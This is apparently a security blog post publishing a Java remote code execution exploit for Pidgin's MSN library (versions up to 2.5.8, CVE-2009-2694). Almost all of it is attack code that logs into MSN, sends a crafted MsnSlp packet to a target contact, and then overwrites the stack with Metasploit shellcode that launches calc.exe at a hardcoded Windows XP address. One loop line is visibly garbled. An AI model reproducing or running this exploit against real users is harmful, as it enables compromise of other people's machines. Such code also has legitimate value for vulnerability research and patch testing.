Indahax - Pierre Noguès

Twitter Facebook Linkedin email

Exploit Pidgin MSN 2.5.8 exécution de code à distance

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
	
/*
* Pidgin MSN <= 2.5.8 Remote Code Execution
*
* Pierre Nogues - pierz@hotmail.it
* http://www.indahax.com/
*
*
* Description:
*        Pidgin is a multi-protocol Instant Messenger.
*
*        This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].
*        The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets
*        which could lead to memory corruption.
*
* Affected versions :
*        Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.
*
* Plateforms :
*        Windows, Linux, Mac
*
* Fix :
*        Fixed in Pidgin 2.5.9
*        Update to the latest version : http://www.pidgin.im/download/
*
* References :
*        [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
*        [2] http://www.coresecurity.com/content/libpurple-arbitrary-write
*        [3] http://www.pidgin.im/news/security/?id=34
*
* Usage :
*        You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
*        javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java
*        java -cp "%classpath%;.\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
*
*/
 
import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;
 
public class PidginExploit {
 
   private MsnMessenger messenger;
   private String login;
   private String password;
   private String target;
 
   private int session_id = NumberUtils.getIntRandom();
 
   private byte shellcode[] = new byte[] {
 
           /*
            * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !
            * sub esp,500
            */
               (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,
 
 
           /*
            * windows/exec - 121 bytes
            * http://www.metasploit.com
            * EXITFUNC=process, CMD=calc.exe
            */
               (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
               (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
               (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
               (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
               (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
               (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
               (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
               (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
               (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
               (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
               (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
               (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
               (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
               (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
               (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
               (byte) 0x00
           };
 
   // reteip = pointer to the return address in the stack
   // The shellcode will be wrote just before reteip
   // and reteip will automaticly point to the shellcode. It's magic !
   private int reteip = 0x0022CFCC;    //stack on XP SP3-FR Pidgin 2.5.8
 
   private int neweip;
   private byte[] payload = new byte[shellcode.length + 4];
   private int totallength = reteip + 4;
 
   public static void main(String[] args) throws Exception {
 
       if(args.length != 3){
           System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
       }else{
           PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);
           exploit.start();
       }
 
   }
 
   public PidginExploit(String login, String password, String target){
       this.login = login;
       this.password = password;
       this.target = target;
 
       neweip = reteip - shellcode.length ;
 
       for(int i=0;i> 8);
       payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);
       payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
   }
 
   public void start() {
       messenger = MsnMessengerFactory.createMsnMessenger(login,password);
       messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);
 
       messenger.setLogIncoming(false);
       messenger.setLogOutgoing(false);
 
       initMessenger(messenger);
       messenger.login();
   }
 
   protected void initMessenger(MsnMessenger messenger) {
 
   messenger.addContactListListener(new MsnContactListAdapter() {
 
           public void contactListInitCompleted(MsnMessenger messenger) {
 
               final Object id = new Object();
 
               messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {
 
                   public void switchboardStarted(MsnSwitchboard switchboard) {
 
                       if (id != switchboard.getAttachment())
                           return;
 
                       switchboard.inviteContact(Email.parseStr(target));
                   }
 
                   public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
                       if (id != switchboard.getAttachment())
                           return;
 
                       MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
                       msg.setIdentifier(NumberUtils.getIntRandom());
                       msg.setSessionId(session_id);
                       msg.setOffset(0);
                       msg.setTotalLength(totallength);
                       msg.setCurrentLength(totallength);
 
                       // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null
                       // We'll use this buffer to rewrite memory in the stack
                       msg.setFlag(0x1000020);
 
                       msg.setP2PDest(target);
 
                       switchboard.sendMessage(msg);
 
                       System.out.println("First packet sent, waiting for the ACK");
 
                   }
 
                   public void switchboardClosed(MsnSwitchboard switchboard) {
                       System.out.println("switchboardClosed");
                       switchboard.getMessenger().removeSwitchboardListener(this);
                   }
 
                   public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
                       System.out.println("contactLeaveSwitchboard");
                   }
               });
               messenger.newSwitchboard(id);
           }
       });
 
       messenger.addMessageListener(new MsnMessageAdapter(){
 
           public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {
 
               //We receive the ACK of our first packet with the ID of the new bogus packet
               message.getIdentifier();
 
               MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
                       payload.length, payload, target);
 
               switchboard.sendMessage(msg);
               System.out.println("ACK received && Payload sent !");
               System.out.println("Exploit OK ! CTRL+C to quit");
 
           }
       });
 
 
 
       messenger.addMessengerListener(new MsnMessengerAdapter() {
 
           public void loginCompleted(MsnMessenger messenger) {
               System.out.println(messenger.getOwner().getEmail() + " login");
           }
 
           public void logout(MsnMessenger messenger) {
               System.out.println(messenger.getOwner().getEmail() + " logout");
           }
 
           public void exceptionCaught(MsnMessenger messenger,
                   Throwable throwable) {
               System.out.println("caught exception: " + throwable);
           }
       });
 
   }
}